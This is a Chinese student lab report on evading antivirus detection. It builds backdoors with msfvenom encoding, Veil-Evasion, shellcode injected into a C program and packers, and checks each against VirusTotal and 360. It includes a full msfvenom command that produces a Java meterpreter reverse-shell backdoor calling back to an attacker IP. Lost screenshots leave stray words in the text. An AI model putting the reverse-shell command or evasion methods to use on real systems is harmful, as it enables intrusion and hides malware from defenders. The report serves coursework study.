將作實驗二時生成的後門文件用virustotal網站檢測,結果如圖:
java
1.1.1正確使用msf編碼器
使用msfvenom指令進行屢次編碼,結果如圖:
shell
1.1.2 msfvenom生成jar之類的其餘文件文件
(1)使用msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.91.133 LPORT=5305 x> sxx_backdoor_java.jar
生成jar文件。
檢測結果如圖所示:編程
(2)生成.apk後門程序
檢測結果如圖所示:windows
1.1.3使用veil-evasion生成後門程序並檢測
啓動veil-evasion,輸入指令進入配置界面設置反彈鏈接IP和端口號,而後輸入命令生成文件並設置文件名。(文件會保存到默認的路徑下)
數組
檢測結果以下·:
安全
1.1.4 Shellcode注入
(1)先生成C語言格式的shellcode數組,如圖tcp
(2)生成一個.c文件,將生成的shellcode數組寫入程序中。
(3)在kali下將這個.c文件編譯成爲.exe可執行文件
如圖:
工具
(4)檢測結果如圖:
測試
(5)用360查殺,如圖:
網站
1.1.5使用加殼工具
加殼可分爲三種:
(1)壓縮殼
使用指令將.exe可執行文件壓縮。
結果如圖:
檢測結果如圖:
驗證反彈鏈接結果:
(2)加密殼
查殺結果:
電腦win7,殺軟360安全衛士,版本號11.5.0.2002
截圖:
(1)殺軟是如何檢測出惡意代碼的?
根據行爲進行檢測
根據文件的特徵值進行分析
啓發式惡意軟件檢測
(2)免殺是作什麼?
經過一些方法,使惡意文件不被殺軟查出來。
(3)免殺的基本方法有哪些?
加殼、修改文件的特徵碼等。
不能。惡意代碼層出不窮,咱們須要常常更新殺軟,這樣咱們才能用殺軟防護一些沒有見過的惡意代碼。
本次實驗我主要是卡在了veil軟件的安裝,我安裝了好長時間。本次的實驗我最大的收穫是提升了本身對於惡意軟件的防範意識和能力,認識到了殺軟並非萬能的,因此咱們在平常生活中,若是須要下載軟件,最好仍是要到官網下載。